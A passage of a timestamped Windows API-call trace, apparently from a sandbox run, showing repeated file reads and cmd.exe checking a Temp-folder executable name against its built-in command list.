lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 
[0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, 
lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 
[0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, 
lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 
[0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.976] _close (_FileHandle=4) returned 0 [0092.977] FindNextFileW (in: hFindFile=0x250f60, lpFindFileData=0x16f550 | out: lpFindFileData=0x16f550) returned 0 [0092.977] GetLastError () returned 0x12 [0092.977] FindClose (in: hFindFile=0x250f60 | out: hFindFile=0x250f60) returned 1 [0092.977] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0092.981] _close (_FileHandle=3) returned 0 [0092.981] GetConsoleTitleW (in: lpConsoleTitle=0x16f9ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.981] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe\"")) returned 0xffffffff [0092.981] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0092.981] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0092.981] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0092.981] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0092.981] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0092.981] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0092.981] _wcsicmp 
(_String1="\"C", _String2="CHDIR") returned -65 [0092.981] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0092.981] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0092.981] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0092.981] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0092.981] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0092.981] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0092.981] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0092.981] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0092.981] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0092.981] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0092.981] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0092.981] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0092.981] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0092.981] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0092.981] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0092.981] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0092.981] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0092.981] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0092.981] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0092.982] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0092.982] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0092.982] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0092.982] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0092.982] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0092.982] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0092.982] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0092.982] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0092.982] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0092.982] _wcsicmp (_String1="\"C", _String2="PUSHD") returned 
-78 [0092.982] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0092.982] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0092.982] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0092.982] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0092.982] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0092.982] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0092.982] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0092.982] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0092.982] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0092.982] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0092.982] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0092.982] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0092.982] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0092.982] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0092.982] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0092.982] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0092.982] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0092.982] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0092.982] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0092.982] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0092.982] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0092.982] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0092.982] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0092.982] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0092.982] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0092.982] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0092.982] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0092.982] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0092.982] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0092.982] _wcsicmp (_String1="\"C", 
